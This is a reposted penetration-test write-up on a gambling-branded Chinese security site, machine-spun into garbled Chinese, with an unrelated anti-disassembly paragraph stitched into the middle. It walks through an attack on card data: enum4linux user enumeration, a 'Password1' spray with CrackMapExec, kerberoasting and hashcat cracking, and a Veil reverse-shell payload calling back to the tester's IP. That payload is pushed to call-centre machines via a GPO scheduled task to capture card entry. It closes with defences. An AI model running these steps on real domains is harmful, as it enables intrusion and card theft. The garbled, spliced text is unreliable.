Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

申博_安全防护 申博 115次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

简介

在存储、传输或处置惩罚信用卡数据的时刻,必须要确保信用卡数据在收集中的平安性。依据PCI数据平安规范(PCI-DSS),持卡人数据可以或许经由历程内部收集发送,然则,若是您完成了收集分段的话,那末就轻易处置惩罚多了,由于这意味着您没必要让公司的全部收集都相符PCI的平安划定。一般的做法是,经由历程防火墙划出一个零丁的网段,特地用来处置惩罚持卡人数据。

上面扼要引见了典范PCI设置的基础知识,下面,我们最先引见真正风趣的器械。

像平常一样,这里已修改了细节信息以珍爱客户的秘要数据。该公司具有一个异常重大的收集,一切收集都在规范的10.0.0.0/8网段内。持卡人数据位于零丁的192.168.0.0/16网段内,以便与公司其他部分的收集断绝开来。这个CDE情况中,呼唤中间工作人员吸收德律风定单,然后将付出信息输入到外部运转的Web应用程序中。

这是一次内部渗入测试,因而,我们从10.0.0.0/8网段上衔接到公司的内部办公收集。我们从本地收集对CDE举行ping扫描和端口扫描,未获得任何有用的信息:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

ping扫描与运转ping敕令基础差不多,但nmap可以或许一次运转扫描全部地点局限。第二个敕令输出中的“hosts up”与我们给nmap运用了-Pn参数有关,该参数的寄义是不要先ping,因而,nmap会将该网段内的一切主机状况申报为“up”,纵然有些主机的状况并非如此(这是nmap的一个怪癖)。

因而,除非存在防火墙划定规矩绕过破绽,或许可以或许猜到防火墙的弱暗码,不然直接接见目的收集是不太可以或许的。因而,入侵的第一步就是经由历程取得域治理员权限,然后再想法掌握运动目次。

成为域治理员

现实上,我们可以或许借助很多要领完成这个目的,好比我之前宣布的这篇文章中提到的要领。

本例中,我们可以或许应用kerberoast来掌握域。然后,从域中无需身份认证的地位最先,逐渐发起进击。

入侵运动目次历程当中,一般先要想法取得一个用户帐户的接见权限,这里对该账户的身份和权限不做任何要求。只需它能以某种体式格局对域掌握器举行身份考证,关于这里来讲就充足了。在Windows天下中,一切帐户都可以或许运用域掌握器举行身份考证,纵然他们没有权限对其实行任何操纵,由于纵然具有最低权限帐户在登录时也须要考证暗码是不是正确。

在该客户的站点上,域掌握器启用了空会话。在本例中,我们的域掌握器是10.0.12.100,“PETER”。因而,我们可以或许运用enum4linux等东西罗列用户列表,显现域中每一个用户的用户名:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

如今,我们取得了一个用户列表,接下来,我们将它剖析成种可用的花样:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

您可以或许已注重到我在简洁性方面并不太在乎。是的,您可以或许用awk、grep、sed和/或Perl以更少字符的来完成这个义务,然则,别忘了我们正在举行渗入测试,我更倾向于运用任何有用的要领,如许可以或许节约我的脑力,从而把重要精神用到完成重要目的上面去。若是我要编写一个长期运用的剧本,我可以或许会对它举行一些优化,然则关于渗入测试义务来讲,我倾向于实验种种敕令,直到我获得我须要的器械为止。

下面举行现实测试。客户的收集异常重大,有25,000个活泼用户。但是,在我的实验室收集中,用户要少的多,这有助于演示渗入测试历程。

如今我们将用户列表剖析成一个文本文件,然后,就可以或许运用CrackMapExec如许的东西来预测暗码了。在这里,我们将测试是不是有用户把“Password1”用作暗码。使人惊奇的是,这完整相符运动目次的默许复杂性划定规矩,由于该暗码中含有四种字符范例中的三种(大写字母、小写字母和数字)。

$ cme smb 10.0.12.100 -u users.txt -p Password1

天呢,居然命中了一个用户:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

请注重,若是我们想继承猜下去,直到找到一切帐户的暗码的话,可以或许指定-continue-on-success符号:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

因而,我们可以或许掌握一个账户了。以是,我们可以或许查询运动目次,从而取得效劳帐户列表。效劳帐户,望文生义,就是为种种效劳设立的用户帐户。至于效劳吗,可以或许简朴的把它们看成是相似Microsoft SQL Server如许的器械。它们运转时,须要在用户帐户的高低文中运转。运动目次的Kerberos身份考证体系可用于供应接见权限,因而,运动目次供应了“效劳单子”,以许可用户对其举行身份考证。Kerberos身份考证不在本文的议论局限以内,然则,若是您想相识更多信息,可以或许接见这里的参考资料。

经由历程向域掌握器要求Kerberos效劳帐户列表,我们也可以或许为每一个帐户取得一张“效劳单子”。虽然该效劳单子运用效劳帐户的暗码举行了加密处置惩罚,然则,若是我们可以或许破解它,就可以或许运用该帐户,而这些账户一般具有很高的权限。为此,我们可以或许借助于Impacket东西集:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

我们可以或许看到,个中一个帐户具有域治理员身份,因而,我们可以或许想法破解其暗码。

反-反汇编patch学习(三)

前两篇文章介绍了两种加花的方法 用call $+5等技巧获得当前EIP,并跳转到指令中间 子函数劫持父函数流程 本文介绍一些更复杂的jxx,各种迷惑反汇编引擎的花式patch技巧 失败的尝试 先吐槽一下,jz&jnz跳转到同样的地址,形如 这个技巧根本就对抗不了IDA的反汇编引擎,线性扫描算法和递归下降算法已经有所了解,但是各种资料都会提到这个做法,我这里尝试了根本就没用,不知道是不是我的打开方式不对 除非jz&jnz又跳转到之前提过的EB花指令上,但这也没有什么新意 jmp到jmp+1 首先我们在一堆nop里patch EB FF,效果如下 jmp的指令位于地址0

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

借助hashcat,我们破解出了明文暗码:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

为了确认这是一个现实的运动帐户,我们可以或许再次运用CrackMapExec。

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

结果注解,我们已取得了域掌握器的治理员权限。

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

OK,接下来怎样运用它来猎取信用卡数据呢?

关于这家公司来讲,不幸的是呼唤中间署理在CDE内用于吸收德律风定单的机械也位于这个运动目次域上。虽然我们没法直接衔接这些机械,但可以或许经由历程域掌握器让它们与我们通讯。为此,我们须要深切相识组战略对象(GPO)。GPO许可将全局或部分设置同时应用于用户和计算机。嗯,现实上不止这些,然则,关于这篇文章来讲,你只须要晓得它许可在全局或更细粒度级别上掌握域中的计算机就好了。

GPO的很多功用都是用于治理公司IT的设置的。比方,设置暗码战略以至设置为用户显现哪些桌面图标(比方,翻开公司网站的快捷体式格局)。而有的GPO则许可运转“立即计划义务”。我们要做的事变,就是建立一个在呼唤中间运转的剧本,并回连我们的机械,为我们供应掌握权。以下是完成该义务的具体步调:

  • 在这里,我们运用Veil Evasion来天生一个payload。个中,我们的IP地点是10.0.12.1,因而,我们让天生的payload回连这个地点。
$ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell veil

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

  • 应用经由历程kerberoasting手艺取得的凭据,经由历程远程桌面协定(RDP)登录到域掌握器。

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

  • 在运动目次中找到CDE。依据我们对该公司的相识,呼唤中间署理位于2楼。我们注重到Active Directory Users and Computers (ADUC)窗口中有一个称号与此相照应:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

  • 将应用Veil制造的剧本放入该文件夹,并在域掌握器上同享。为该同享和目次设置许可一切域用户举行读取的权限。

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

  • 在GPO中,我们在该级别上建立一个战略:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

  • 在编纂这个新GPO时,找到“Scheduled Tasks”选项,并新建一个“Immediate Scheduled Task”:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

  • 建立义务,使其指向同享中生存的版本。同时在“common”下设置“Run in logged-on user’s security context”。

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

搞定了!

我等了15分钟,甚么也没发生。我晓得更新组战略可以或许须要90分钟,高低有30分钟的浮动,但我预计至少有一台计算机如今已取得了新战略(注重,若是在实验室中测试,可以或许运用gpupdate /force敕令)。以后,我又等了一段时间。我正要摒弃时,起色涌现了:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

实行截图敕令后,返回的图象注解呼唤中间座席事先输入的内容为……信用卡数据:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

信用卡数据被泄露了,也就是说,此次渗入测试的目的顺遂达成了。

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

若是检察会话列表,可以或许看到源IP来自192.168.0.0/16网段,即CDE网段:

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

在现实测试中,shell赓续被返回,正确说,全部二楼上的每台机械都返回了shell。算下来,这个网段中,大概有60-100个Meterpreter shell被翻开了。

请注重,虽然屏幕截图中显现了亚马逊,然则它与本文触及的公司无关。在现实测试中,可以或许设置一个剧本在衔接shell时捕捉屏幕截图(经由历程autorunscript),如许,我们就可以或许专注于那些更让人入神的会话上面,比方那些已完成了某些步调,行将进入数据录入阶段的会话上面。

另外,也可以或许运用其他要领来猎取截图,比方在Meterpreter中运用espia,和运用Metasploit的post/windows/gather/screen_spy东西等。

同时,我们也可以或许经由历程编程体式格局来实行GPO,比方运用PowerView中的New-GPOImmediateTask等,不外,我还没有举行实验。

防备步伐

对此进击的防备步伐是,一直让CDE运用一个零丁的运动目次域。请注重,纵然是丛林也没紧要。固然,深度防备步伐是封闭空会话,勉励用户运用强暗码,并确保任何效劳帐户都运用充足长的暗码(起码20个字符以上,而且完整随机拔取)。另外,还可以或许检测是不是有用户一次要求一切效劳单子,或许或许建立一个蜜罐效劳帐户,若是有人以这类体式格局请求效劳单子,就将其符号出来,这些步伐也很有资助。若是黑客可以或许接见公司的其他部分,那末就很难找到有用的要领来珍爱信用卡数据。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址